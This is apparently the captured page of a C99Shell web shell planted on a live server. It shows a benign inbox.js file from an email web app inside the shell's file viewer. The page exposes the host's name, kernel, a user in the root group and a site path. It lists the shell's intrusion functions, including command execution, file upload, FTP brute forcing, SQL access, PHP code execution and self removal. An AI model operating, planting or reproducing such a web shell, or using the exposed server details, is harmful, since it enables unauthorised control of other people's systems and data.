!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/public/js/customer/   drwxr-xr-x
Free 28.34 GB of 117.98 GB (24.02%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     inbox.js (1.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"use strict";
$(document).on('click', '.emailbox-unread', function (e) {
    e.preventDefault();
    $(this).removeClass('emailbox-unread').addClass('emailbox-read').attr('title', 'Already Read');
    const id = $(this).attr('data-message-id');
    $.ajax({
        method: 'post',
        url: 'customer/emailbox/inbox/change-status',
        data: {_token: '{{csrf_token()}}', id: id, status: 'read'},
        success: function (res) {
            if (res.status == 'success') {
                notify('success', res.message);
            } else {
                notify('danger', res.message);
            }
        }
    })
})

$('#checkbox-toggle').on('click', function (e) {
    e.preventDefault();
    if ($(this).attr('data-checked') == 'false') {
        $(this).attr('data-checked', 'true');
        $(this).find('i').removeClass('fa-square').addClass('fa-check-square');
    } else {
        $(this).attr('data-checked', 'false');
        $(this).find('i').addClass('fa-square').removeClass('fa-check-square');
    }

    $('.check-single').click();
})

$('#move-trash').on('click', function (e) {
    const classes = document.getElementsByClassName("check-single");
    let totalIds = [];
    let ids = [];
    for (var i = 0; i < classes.length; i++) {
        if ($(classes.item(i)).is(':checked'))
            ids[i] = $(classes.item(i)).attr('data-id');
    }
    totalIds['ids'] = ids;
    $(this).attr('data-input', JSON.stringify(Object.assign({}, totalIds))).modal('show');

});
$(".show-more").css('overflow', 'hidden').readmore({collapsedHeight: 20});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0031 ]--